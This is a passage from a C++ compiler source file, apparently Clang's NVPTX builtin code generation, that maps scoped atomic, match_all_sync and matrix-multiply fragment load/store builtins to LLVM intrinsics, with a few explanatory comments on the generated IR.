return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_release_add_shared_i:
case NVPTX::BI__nvvm_atom_release_add_shared_l:
case NVPTX::BI__nvvm_atom_release_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release);
case NVPTX::BI__nvvm_atom_release_add_shared_f:
case NVPTX::BI__nvvm_atom_release_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release);
case NVPTX::BI__nvvm_atom_release_max_shared_i:
case NVPTX::BI__nvvm_atom_release_max_shared_l:
case NVPTX::BI__nvvm_atom_release_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release);
case NVPTX::BI__nvvm_atom_release_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release);
case NVPTX::BI__nvvm_atom_release_min_shared_i:
case NVPTX::BI__nvvm_atom_release_min_shared_l:
case NVPTX::BI__nvvm_atom_release_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release);
case NVPTX::BI__nvvm_atom_release_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release);
case NVPTX::BI__nvvm_atom_release_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release);
case NVPTX::BI__nvvm_atom_release_and_shared_i:
case NVPTX::BI__nvvm_atom_release_and_shared_l:
case NVPTX::BI__nvvm_atom_release_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release);
case NVPTX::BI__nvvm_atom_release_or_shared_i:
case NVPTX::BI__nvvm_atom_release_or_shared_l:
case NVPTX::BI__nvvm_atom_release_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release);
case NVPTX::BI__nvvm_atom_release_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release);
case NVPTX::BI__nvvm_atom_release_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release);
case NVPTX::BI__nvvm_atom_release_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_match_all_sync_i32p:
case NVPTX::BI__nvvm_match_all_sync_i64p: {
Value *Mask = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Address PredOutPtr = EmitPointerWithAlignment(E->getArg(2));
Value *ResultPair = Builder.CreateCall(
CGM.getIntrinsic(BuiltinID == NVPTX::BI__nvvm_match_all_sync_i32p
? Intrinsic::nvvm_match_all_sync_i32p
: Intrinsic::nvvm_match_all_sync_i64p),
{Mask, Val});
Value *Pred = Builder.CreateZExt(Builder.CreateExtractValue(ResultPair, 1),
PredOutPtr.getElementType());
Builder.CreateStore(Pred, PredOutPtr);
return Builder.CreateExtractValue(ResultPair, 0);
}
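// For reference, a minimal sketch of the IR produced above (value names are
// illustrative, not emitted by the builder):
//   %pair = call { i32, i1 } @llvm.nvvm.match.all.sync.i32p(i32 %mask, i32 %val)
//   %res  = extractvalue { i32, i1 } %pair, 0
//   %pred = extractvalue { i32, i1 } %pair, 1
//   %ext  = zext i1 %pred to i32
//   store i32 %ext, i32* %pred_out
// and the builtin evaluates to %res.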
// FP MMA loads.
case NVPTX::BI__hmma_m16n16k16_ld_a:
case NVPTX::BI__hmma_m16n16k16_ld_b:
case NVPTX::BI__hmma_m16n16k16_ld_c_f16:
case NVPTX::BI__hmma_m16n16k16_ld_c_f32:
case NVPTX::BI__hmma_m32n8k16_ld_a:
case NVPTX::BI__hmma_m32n8k16_ld_b:
case NVPTX::BI__hmma_m32n8k16_ld_c_f16:
case NVPTX::BI__hmma_m32n8k16_ld_c_f32:
case NVPTX::BI__hmma_m8n32k16_ld_a:
case NVPTX::BI__hmma_m8n32k16_ld_b:
case NVPTX::BI__hmma_m8n32k16_ld_c_f16:
case NVPTX::BI__hmma_m8n32k16_ld_c_f32:
// Integer MMA loads.
case NVPTX::BI__imma_m16n16k16_ld_a_s8:
case NVPTX::BI__imma_m16n16k16_ld_a_u8:
case NVPTX::BI__imma_m16n16k16_ld_b_s8:
case NVPTX::BI__imma_m16n16k16_ld_b_u8:
case NVPTX::BI__imma_m16n16k16_ld_c:
case NVPTX::BI__imma_m32n8k16_ld_a_s8:
case NVPTX::BI__imma_m32n8k16_ld_a_u8:
case NVPTX::BI__imma_m32n8k16_ld_b_s8:
case NVPTX::BI__imma_m32n8k16_ld_b_u8:
case NVPTX::BI__imma_m32n8k16_ld_c:
case NVPTX::BI__imma_m8n32k16_ld_a_s8:
case NVPTX::BI__imma_m8n32k16_ld_a_u8:
case NVPTX::BI__imma_m8n32k16_ld_b_s8:
case NVPTX::BI__imma_m8n32k16_ld_b_u8:
case NVPTX::BI__imma_m8n32k16_ld_c:
// Sub-integer MMA loads.
case NVPTX::BI__imma_m8n8k32_ld_a_s4:
case NVPTX::BI__imma_m8n8k32_ld_a_u4:
case NVPTX::BI__imma_m8n8k32_ld_b_s4:
case NVPTX::BI__imma_m8n8k32_ld_b_u4:
case NVPTX::BI__imma_m8n8k32_ld_c:
case NVPTX::BI__bmma_m8n8k128_ld_a_b1:
case NVPTX::BI__bmma_m8n8k128_ld_b_b1:
case NVPTX::BI__bmma_m8n8k128_ld_c:
// Double MMA loads.
case NVPTX::BI__dmma_m8n8k4_ld_a:
case NVPTX::BI__dmma_m8n8k4_ld_b:
case NVPTX::BI__dmma_m8n8k4_ld_c:
// Alternate float MMA loads.
case NVPTX::BI__mma_bf16_m16n16k16_ld_a:
case NVPTX::BI__mma_bf16_m16n16k16_ld_b:
case NVPTX::BI__mma_bf16_m8n32k16_ld_a:
case NVPTX::BI__mma_bf16_m8n32k16_ld_b:
case NVPTX::BI__mma_bf16_m32n8k16_ld_a:
case NVPTX::BI__mma_bf16_m32n8k16_ld_b:
case NVPTX::BI__mma_tf32_m16n16k8_ld_a:
case NVPTX::BI__mma_tf32_m16n16k8_ld_b:
case NVPTX::BI__mma_tf32_m16n16k8_ld_c: {
Address Dst = EmitPointerWithAlignment(E->getArg(0));
Value *Src = EmitScalarExpr(E->getArg(1));
Value *Ldm = EmitScalarExpr(E->getArg(2));
Optional<llvm::APSInt> isColMajorArg =
E->getArg(3)->getIntegerConstantExpr(getContext());
if (!isColMajorArg)
return nullptr;
bool isColMajor = isColMajorArg->getSExtValue();
NVPTXMmaLdstInfo II = getNVPTXMmaLdstInfo(BuiltinID);
unsigned IID = isColMajor ? II.IID_col : II.IID_row;
if (IID == 0)
return nullptr;
Value *Result =
Builder.CreateCall(CGM.getIntrinsic(IID, Src->getType()), {Src, Ldm});
// Save returned values.
assert(II.NumResults);
if (II.NumResults == 1) {
Builder.CreateAlignedStore(Result, Dst.getPointer(),
CharUnits::fromQuantity(4));
} else {
for (unsigned i = 0; i < II.NumResults; ++i) {
Builder.CreateAlignedStore(
Builder.CreateBitCast(Builder.CreateExtractValue(Result, i),
Dst.getElementType()),
Builder.CreateGEP(Dst.getElementType(), Dst.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
}
}
return Result;
}
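// Illustrative example (the call below is hypothetical, not from this file):
//   __hmma_m16n16k16_ld_a(dst, src, ldm, /*isColMajor=*/0);
// picks the row-major variant from getNVPTXMmaLdstInfo, calls the
// corresponding wmma load intrinsic, and the loop above scatters each
// extracted fragment element into dst[i] with 4-byte alignment.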
case NVPTX::BI__hmma_m16n16k16_st_c_f16:
case NVPTX::BI__hmma_m16n16k16_st_c_f32:
case NVPTX::BI__hmma_m32n8k16_st_c_f16:
case NVPTX::BI__hmma_m32n8k16_st_c_f32:
case NVPTX::BI__hmma_m8n32k16_st_c_f16:
case NVPTX::BI__hmma_m8n32k16_st_c_f32:
case NVPTX::BI__imma_m16n16k16_st_c_i32:
case NVPTX::BI__imma_m32n8k16_st_c_i32:
case NVPTX::BI__imma_m8n32k16_st_c_i32:
case NVPTX::BI__imma_m8n8k32_st_c_i32:
case NVPTX::BI__bmma_m8n8k128_st_c_i32:
case NVPTX::BI__dmma_m8n8k4_st_c_f64:
case NVPTX::BI__mma_m16n16k8_st_c_f32: {
Value *Dst = EmitScalarExpr(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *Ldm = EmitScalarExpr(E->getArg(2));
Optional<llvm::APSInt> isColMajorArg =
E->getArg(3)->getIntegerConstantExpr(getContext());
if (!isColMajorArg)
return nullptr;
bool isColMajor = isColMajorArg->getSExtValue();
NVPTXMmaLdstInfo II = getNVPTXMmaLdstInfo(BuiltinID);
unsigned IID = isColMajor ? II.IID_col : II.IID_row;
if (IID == 0)
return nullptr;
Function *Intrinsic = CGM.getIntrinsic(IID, Dst->getType());
llvm::Type *ParamType = Intrinsic->getFunctionType()->getParamType(1);
SmallVector<Value *, 10> Values = {Dst};
for (unsigned i = 0; i < II.NumResults; ++i) {
Value *V = Builder.CreateAlignedLoad(
Src.getElementType(),
Builder.CreateGEP(Src.getElementType(), Src.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, ParamType));
}
Values.push_back(Ldm);
Value *Result = Builder.CreateCall(Intrinsic, Values);
return Result;
}
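// The store path mirrors the load path: each fragment element is loaded
// from src[i], bitcast to the intrinsic's expected parameter type, and the
// destination pointer plus leading dimension are passed through, e.g. the
// hypothetical call
//   __hmma_m16n16k16_st_c_f32(dst, src, ldm, /*isColMajor=*/1);
// lowers to a single column-major wmma store intrinsic call.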
// BI__hmma_m16n16k16_mma_<DType><CType>(d, a, b, c, layout, satf) -->
